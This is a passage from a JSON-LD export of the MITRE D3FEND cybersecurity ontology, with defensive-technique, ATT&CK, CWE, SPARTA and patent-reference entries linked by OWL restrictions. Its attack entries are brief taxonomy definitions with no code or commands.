        "d3f:AccessPolicyAdministration"
      ],
      "d3f:d3fend-id": "D3-APA",
      "d3f:definition": "Access policy administration is the systematic process of defining, implementing, and managing access control policies that dictate user permissions to resources.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "d3f:synonym": "Access Control Administration",
      "rdfs:label": "Access Policy Administration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N1089ed46540c45a59aaa988b5a74de55"
        }
      ]
    },
    {
      "@id": "_:N1089ed46540c45a59aaa988b5a74de55",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "d3f:FlashMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Flash memory is an electronic non-volatile computer memory storage medium that can be electrically erased and reprogrammed.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Flash_memory"
      },
      "rdfs:label": "Flash Memory",
      "rdfs:subClassOf": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:TimeInstant",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A time instant is a zero-dimensional temporal region that has no duration and represents a singular point in the temporal continuum. Time instants serve as the temporal boundaries of temporal intervals and as the indexical points at which continuants exist and bear their qualities.",
      "rdfs:label": "Time Instant",
      "rdfs:subClassOf": {
        "@id": "d3f:Time"
      }
    },
    {
      "@id": "d3f:T1404",
      "@type": "owl:Class",
      "d3f:attack-id": "T1404",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in order to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in an application, service, within the operating system software, or kernel itself to execute adversary-controlled code. Security constructions, such as permission levels, will often hinder access to information and use of certain techniques. Adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.",
      "rdfs:label": "Exploitation for Privilege Escalation - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
      },
      "skos:prefLabel": "Exploitation for Privilege Escalation"
    },
    {
      "@id": "d3f:DS0010",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs",
      "d3f:exactly": {
        "@id": "d3f:CloudStorage"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Cloud Storage Metadata component",
      "rdfs:label": "Cloud Storage (ATT&CK DS)"
    },
    {
      "@id": "d3f:AccessControlEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that captures the implementation or evaluation of access control measures, including the application of rules and policies to govern the accessibility of resources by agents within a digital system.",
      "rdfs:label": "Access Control Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthorizationEvent"
        },
        {
          "@id": "_:Nb46ffc261e1b40d8b14b68332a6bf373"
        }
      ]
    },
    {
      "@id": "_:Nb46ffc261e1b40d8b14b68332a6bf373",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:CWE-61",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-61",
      "d3f:definition": "The product, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.",
      "d3f:synonym": [
        "Symlink following",
        "symlink vulnerability"
      ],
      "rdfs:label": "UNIX Symbolic Link (Symlink) Following",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-59"
      }
    },
    {
      "@id": "d3f:OTDebugCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Investigate or analyze the current state of the system.",
      "rdfs:label": "OT Debug Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDiagnosticsMessageEvent"
        },
        {
          "@id": "_:N30d45941b0fe40b18a2a672d25875cee"
        }
      ]
    },
    {
      "@id": "_:N30d45941b0fe40b18a2a672d25875cee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDebugCommand"
      }
    },
    {
      "@id": "d3f:CWE-296",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-296",
      "d3f:definition": "The product does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate.",
      "rdfs:label": "Improper Following of a Certificate's Chain of Trust",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-295"
        },
        {
          "@id": "d3f:CWE-573"
        }
      ]
    },
    {
      "@id": "d3f:T1625",
      "@type": "owl:Class",
      "d3f:attack-id": "T1625",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time.",
      "rdfs:label": "Hijack Execution Flow - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Hijack Execution Flow"
    },
    {
      "@id": "d3f:CWE-1386",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1386",
      "d3f:definition": "The product opens a file or directory, but it does not properly prevent the name from being associated with a junction or mount point to a destination that is outside of the intended control sphere.",
      "rdfs:label": "Insecure Operation on Windows Junction / Mount Point",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-59"
      }
    },
    {
      "@id": "d3f:RPCNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "RPC network traffic is network traffic related to remote procedure calls between network nodes..This includes only network traffic conforming to a standard RPC protocol; not custom protocols.",
      "rdfs:label": "RPC Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:may-counter",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-counter",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:CWE-321",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-321",
      "d3f:definition": "The product uses a hard-coded, unchangeable cryptographic key.",
      "rdfs:label": "Use of Hard-coded Cryptographic Key",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-798"
      }
    },
    {
      "@id": "d3f:Graph-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GBC",
      "d3f:definition": "Graph-based Clustering is a form of clustering where data is represented with graphs to identify clusters.  We include Connection-based Clustering in this class.",
      "d3f:kb-article": "## References\n1. Jagota, A. (13 Dec 2020). Density-based and Graph-based Clustering. towardsdatascience.com. [Link](https://towardsdatascience.com/density-based-and-graph-based-clustering-a1f0d45ff5fb)\n\n1. Connectivity-Based Clustering. Sarang, P. (2023) in Thinking Data Science. The Springer Series in Applied Machine Learning. Springer, Cham. [Link](https://doi.org/10.1007/978-3-031-02363-7_10).",
      "d3f:synonym": "Connection-based Clustering",
      "rdfs:label": "Graph-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-009%3ACompiledHTMLAccess_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-009/"
      },
      "d3f:kb-abstract": "Adversaries may hide malicious code in .chm compiled HTML files. When these files are read, Windows uses the HTML help executable named hh.exe, which is the signature for this analytic.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-009: Compiled HTML Access",
      "rdfs:label": "Reference - CAR-2020-11-009: Compiled HTML Access - MITRE"
    },
    {
      "@id": "d3f:Reference-MalwareDetectionUsingLocalComputationalModels_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190026466A1"
      },
      "d3f:kb-abstract": "Example techniques herein determine that a trial data stream is associated with malware (\"dirty\") using a local computational model (CM). The data stream can be represented by a feature vector. A control unit can receive a first, dirty feature vector (e.g., a false miss) and determine the local CM based on the first feature vector. The control unit can receive a trial feature vector representing the trial data stream. The control unit can determine that the trial data stream is dirty if a broad CM or the local CM determines that the trial feature vector is dirty. In some examples, the local CM can define a dirty region in a feature space. The control unit can determine the local CM based on the first feature vector and other clean or dirty feature vectors, e.g., a clean feature vector nearest to the first feature vector.",
      "d3f:kb-author": "Sven Krasser,David Elkind, Patrick Crenshaw, Kirby James Koster",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:kb-reference-title": "Malware detection using local computational models",
      "rdfs:label": "Reference - Malware detection using local computational models - Crowdstrike Inc"
    },
    {
      "@id": "d3f:T1613",
      "@type": "owl:Class",
      "d3f:attack-id": "T1613",
      "d3f:definition": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.",
      "rdfs:label": "Container and Resource Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:T1491",
      "@type": "owl:Class",
      "d3f:attack-id": "T1491",
      "d3f:definition": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages.",
      "rdfs:label": "Defacement",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:ProcessorComponent",
      "@type": "owl:Class",
      "d3f:definition": "A Processor Component is a functional subunit or module within a processor that performs specific tasks to support the processor's overall operation.",
      "rdfs:label": "Processor Component",
      "rdfs:seeAlso": {
        "@id": "d3f:Processor"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:NetworkFlowSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Monitors network traffic and produces summaries of data flows traversing the network.",
      "d3f:monitors": {
        "@id": "d3f:NetworkFlow"
      },
      "rdfs:label": "Network Flow Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkSensor"
        },
        {
          "@id": "_:N1df765defdb7493fb32ee5e4db7b18fc"
        }
      ]
    },
    {
      "@id": "_:N1df765defdb7493fb32ee5e4db7b18fc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkFlow"
      }
    },
    {
      "@id": "d3f:records",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x records y: The digital artifact x makes a record of events y; set down in permanent form.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01002259-v"
      },
      "rdfs:label": "records",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01003181-v"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1555.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:DatabaseFile"
      },
      "d3f:attack-id": "T1555.003",
      "d3f:definition": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.",
      "d3f:may-access": {
        "@id": "d3f:In-memoryPasswordStore"
      },
      "d3f:may-invoke": {
        "@id": "d3f:ReadFile"
      },
      "rdfs:label": "Credentials from Web Browsers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1555"
        },
        {
          "@id": "_:N745e22bfb3ab4237b1af9b6aba2753e8"
        },
        {
          "@id": "_:N219f8d42b3d34e0fb5a19f6cfd420f7d"
        },
        {
          "@id": "_:N90fd298c7aff4cd591ed4586b02563da"
        }
      ]
    },
    {
      "@id": "_:N745e22bfb3ab4237b1af9b6aba2753e8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseFile"
      }
    },
    {
      "@id": "_:N219f8d42b3d34e0fb5a19f6cfd420f7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:In-memoryPasswordStore"
      }
    },
    {
      "@id": "_:N90fd298c7aff4cd591ed4586b02563da",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ReadFile"
      }
    },
    {
      "@id": "d3f:GetSystemTime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system call that gets the system time.  For POSIX.1 systems, time() invokes a call to get the system time.",
      "rdfs:label": "Get System Time",
      "rdfs:seeAlso": {
        "@id": "https://man7.org/linux/man-pages/man2/time.2.html"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:has-agent",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-agent y: The event x occurs because agent y actively carries it out.",
      "rdfs:label": "has-agent",
      "rdfs:subPropertyOf": {
        "@id": "d3f:has-participant"
      }
    },
    {
      "@id": "d3f:DecoyNetworkResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyNetworkResource"
      ],
      "d3f:d3fend-id": "D3-DNR",
      "d3f:definition": "Deploying a network resource for the purposes of deceiving an adversary.",
      "d3f:kb-article": "## How it works\nDecoy network resources are deployed to web application servers, network file shares, or other network based sharing services.\n\nA \"honeypot\" may serve a variety of decoy network resources.\n\n## Considerations\n\n* Developing a deployment and placement strategy for the decoy network resource.\n* Personnel responsible for creation of decoy networks should consider the potential for resource exhaustion through denial of service attacks.\n\n## Examples\n* Honeypots are typically used to mimic a known system with fake vulnerabilities. This may attract attackers to the honeypot.\n* Decoy accounts are also used to scan for attempted logins. The decoy accounts can provide security analysts with the attacker's potential intents and strategies.\n* Tarpits are used to monitor unallocated IP space for unauthorized network activity.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AutomaticallyGeneratingNetworkResourceGroupsAndAssigningCustomizedDecoyPoliciesThereto_IllusiveNetworksLtd"
        },
        {
          "@id": "d3f:Reference-Deception-BasedResponsesToSecurityAttacks_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-DynamicSelectionAndGenerationOfAVirtualCloneForDetonationOfSuspiciousContentWithinAHoneyNetwork_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForIdentifyingThePresenceOfMalwareUsingMini-trapsSetAtNetworkEndpoints_FidelisCybersecuritySolutionsInc"
        }
      ],
      "d3f:spoofs": {
        "@id": "d3f:NetworkResource"
      },
      "rdfs:label": "Decoy Network Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyObject"
        },
        {
          "@id": "_:Na729d0a8fd8d457d91ecd47a9ffeec58"
        }
      ]
    },
    {
      "@id": "_:Na729d0a8fd8d457d91ecd47a9ffeec58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:CWE-835",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-835",
      "d3f:definition": "The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.",
      "rdfs:label": "Loop with Unreachable Exit Condition ('Infinite Loop')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-834"
      }
    },
    {
      "@id": "d3f:CWE-663",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-663",
      "d3f:definition": "The product calls a non-reentrant function in a concurrent context in which a competing code sequence (e.g. thread or signal handler) may have an opportunity to call the same function or otherwise influence its state.",
      "rdfs:label": "Use of a Non-reentrant Function in a Concurrent Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-662"
      }
    },
    {
      "@id": "d3f:Reference-AnomalyDetectionUsingAdaptiveBehavioralProfiles_SecuronixInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160226901A1"
      },
      "d3f:kb-abstract": "The invention provides a system and method for automatic creation of adaptive behavioral profiles for observables associated with resource states and events in a computer network (IT) infrastructure of an enterprise and for detecting anomalies that represent potential malicious activity and threats as deviations from normal behavior. Separate profiles may be created for each behavioral indicator, as well as for each time series of measurements, and aggregated to create an overall behavioral profile. An anomaly probability is determined from the behavioral profile and used to evaluate the data values of observables. Outlier data values which deviate from normal behavior by more than a predetermined probability threshold are identified for risk analysis as possible threats while inliers within the range of normal behavior are used to update the behavioral profile. Behavioral profiles are created for behavioral indicators based upon observables measured over predetermined time periods using algorithms employing statistical analysis approaches that work for any type of data distribution, and profiles are adapted over time using data aging to more closely represent current behavior. Algorithm parameters for creating profiles are based on the type of data, i.e., its metadata.",
      "d3f:kb-author": "Igor A. Baikalov; Tanuj Gulati; Sachin Nayyar; Anjaneya Shenoy; Ganpatrao H. Patwardhan",
      "d3f:kb-mitre-analysis": "The patent describes a technique for detecting anomalous activity within an organization's IT infrastructure to identify threats. Behavioral profiles can be grouped by peer groups that identify functionally similar groups of actors (users or resources) based on their attributes and pre-defined grouping rules. For example, users can be grouped by their job title, organizational hierarchy, or location and can be observed for similarities in access patterns, based on granted access entitlements or actual logged resource access.\n\nBehavioral profiles are created from measurements of events over a time period for example:\n\n* Transaction counts\n* Concurrent users per hour\n* Daily volume of data\n\nOutlier data values which deviate from behavioral profile by more than a predetermined probability threshold are identified for risk analysis as possible threats.",
      "d3f:kb-organization": "Securonix Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:JobFunctionAccessPatternAnalysis"
      },
      "d3f:kb-reference-title": "Anomaly Detection Using Adaptive Behavioral Profiles",
      "rdfs:label": "Reference - Anomaly Detection Using Adaptive Behavioral Profiles - Securonix Inc"
    },
    {
      "@id": "d3f:M1020",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "D3FEND models this as an infrastructure dependency to support D3-NTA.",
      "d3f:related": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "rdfs:label": "SSL/TLS Inspection"
    },
    {
      "@id": "d3f:WindowsNtFreeVirtualMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The NtFreeVirtualMemory routine releases, decommits, or both releases and decommits, a region of pages within the virtual address space of a specified process.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntfreevirtualmemory"
      },
      "rdfs:label": "Windows NtFreeVirtualMemory",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIFreeMemory"
      }
    },
    {
      "@id": "d3f:WindowsCreateFileA",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates or opens a file or I/O device. The most commonly used I/O devices are as follows: file, file stream, directory, physical disk, volume, console buffer, tape drive, communications resource, mailslot, and pipe. The function returns a handle that can be used to access the file or device for various types of I/O depending on the file or device and the flags and attributes specified.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtCreateFile"
        },
        {
          "@id": "d3f:WindowsNtCreateMailslotFile"
        },
        {
          "@id": "d3f:WindowsNtCreateNamedPipeFile"
        },
        {
          "@id": "d3f:WindowsNtCreatePagingFile"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea"
      },
      "rdfs:label": "Windows CreateFileA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICreateFile"
        },
        {
          "@id": "d3f:OSAPIOpenFile"
        },
        {
          "@id": "_:N4274fa726b7b432c85ffa3a4e0112bdf"
        },
        {
          "@id": "_:Na4bba0db2a5c49a1b672c64eb75ede12"
        },
        {
          "@id": "_:N0dce6140ab1d4dfba65a2469fbac8601"
        },
        {
          "@id": "_:N4588bee8a34e45dfb06c6ddf154ea7f8"
        }
      ]
    },
    {
      "@id": "_:N4274fa726b7b432c85ffa3a4e0112bdf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateFile"
      }
    },
    {
      "@id": "_:Na4bba0db2a5c49a1b672c64eb75ede12",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateMailslotFile"
      }
    },
    {
      "@id": "_:N0dce6140ab1d4dfba65a2469fbac8601",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateNamedPipeFile"
      }
    },
    {
      "@id": "_:N4588bee8a34e45dfb06c6ddf154ea7f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreatePagingFile"
      }
    },
    {
      "@id": "d3f:Reference-MITREATTACKPasswordPolicies",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://attack.mitre.org/mitigations/M0927/"
      },
      "d3f:kb-abstract": "Set and enforce secure password policies for accounts..",
      "d3f:kb-author": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ChangeDefaultPassword"
      },
      "d3f:kb-reference-title": "MITRE ATT&CK - Password Policies",
      "rdfs:label": "Reference - MITRE ATT&CK - Password Policies"
    },
    {
      "@id": "d3f:AML.T0000.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0000.000",
      "d3f:definition": "Many of the publications accepted at premier artificial intelligence conferences and journals come from commercial labs.\nSome journals and conferences are open access, others may require paying for access or a membership.\nThese publications will often describe in detail all aspects of a particular approach for reproducibility.\nThis information can be used by adversaries to implement the paper.",
      "rdfs:label": "Journals and Conference Proceedings - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0000.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0000"
      },
      "skos:prefLabel": "Journals and Conference Proceedings"
    },
    {
      "@id": "d3f:T1568.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1568.001",
      "d3f:definition": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)",
      "rdfs:label": "Fast Flux DNS",
      "rdfs:subClassOf": {
        "@id": "d3f:T1568"
      }
    },
    {
      "@id": "d3f:ATTACKMobileInitialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0027"
      },
      "rdfs:label": "Initial Access Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N66da41f1a214466380e71f6beb377593"
        }
      ],
      "skos:prefLabel": "Initial Access Technique"
    },
    {
      "@id": "_:N66da41f1a214466380e71f6beb377593",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0027"
      }
    },
    {
      "@id": "d3f:DatabaseServiceApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software application that interacts with a database management system (DBMS) hosted as a separate, standalone service or server.",
      "d3f:instructs": {
        "@id": "d3f:DatabaseService"
      },
      "rdfs:label": "Database Service Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DatabaseApplication"
        },
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:Nf448ca3792de47139e80c0a719622251"
        }
      ]
    },
    {
      "@id": "_:Nf448ca3792de47139e80c0a719622251",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseService"
      }
    },
    {
      "@id": "d3f:REC-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0003",
      "d3f:definition": "Threat actors assemble a detailed picture of the mission’s RF and networking posture across TT&C and payload links. Useful elements include frequency bands and allocations, emission designators, modulation/coding, data rates, polarization sense, Doppler profiles, timing and ranging schemes, link budgets, and expected Eb/N0 margins. They also seek antenna characteristics, beacon structures, and whether transponders are bent-pipe or regenerative. On the ground, they track station locations, apertures, auto-track behavior, front-end filters/LNAs, and handover rules, plus whether services traverse SLE, SDN, or commercial cloud backbones. Even small details, polarization sense, roll-off factors, or beacon cadence, shrink the search space for interception, spoofing, or denial. The outcome is a lab-replicable demod/decode chain and a calendar of advantageous windows.",
      "rdfs:label": "Gather Spacecraft Communications Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Spacecraft Communications Information"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodsThereofForPreventingRansomwareFromEncryptingDataElementsStoredInAMemoryOfAComputer-basedSystem_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170308711A1/en?oq=US-2017308711-A1"
      },
      "d3f:kb-abstract": "A computerized method for preventing ransomware from encrypting data elements stored in a memory of a computer-based system, the method comprising identifying at least one identifier for a data element, wherein the at least one identifier indicates at least a position of the data element within the memory. An optimal number of virtual traps is determined for the data element corresponding to the at least one identifier. An optimal position for each of the virtual traps is determined corresponding to the at least one identifier. The virtual traps are send to the determined optimal position within the memory.",
      "d3f:kb-author": "Gil BARAK",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyFile"
      },
      "d3f:kb-reference-title": "System and methods thereof for preventing ransomware from encrypting data elements stored in a memory of a computer-based system",
      "rdfs:label": "Reference - System and methods thereof for preventing ransomware from encrypting data elements stored in a memory of a computer-based system - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:T1036.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036.008",
      "d3f:definition": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file,  is <code> 0xFF 0xD8</code> and the file extension is either `.JPE`, `.JPEG` or `.JPG`.",
      "rdfs:label": "Masquerade File Type",
      "rdfs:subClassOf": {
        "@id": "d3f:T1036"
      }
    },
    {
      "@id": "d3f:StrongPasswordPolicy",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:StrongPasswordPolicy"
      ],
      "d3f:d3fend-id": "D3-SPP",
      "d3f:definition": "Modifying system configuration to increase password strength.",
      "d3f:kb-article": "## How it works\nPassword strength guidelines include increasing password length, permitting passwords that contain ASCII or Unicode characters, and requiring systems to screen new passwords against lists of commonly used or compromised passwords.\n## Considerations\nExtremely complex password requirements may lead users to saving passwords in text files or picking obvious passwords that meet the policy.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DigitalIdentityGuidelines800-63-3"
        },
        {
          "@id": "d3f:Reference-Testing_Metrics_for_Password_Creation_Policies_by_Attacking_Large_Sets_of_Revealed_Passwords"
        }
      ],
      "d3f:strengthens": {
        "@id": "d3f:Password"
      },
      "rdfs:label": "Strong Password Policy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialHardening"
        },
        {
          "@id": "_:Nfe048a049ccc459f9fc4e0457d353352"
        }
      ]
    },
    {
      "@id": "_:Nfe048a049ccc459f9fc4e0457d353352",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:strengthens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:T1085",
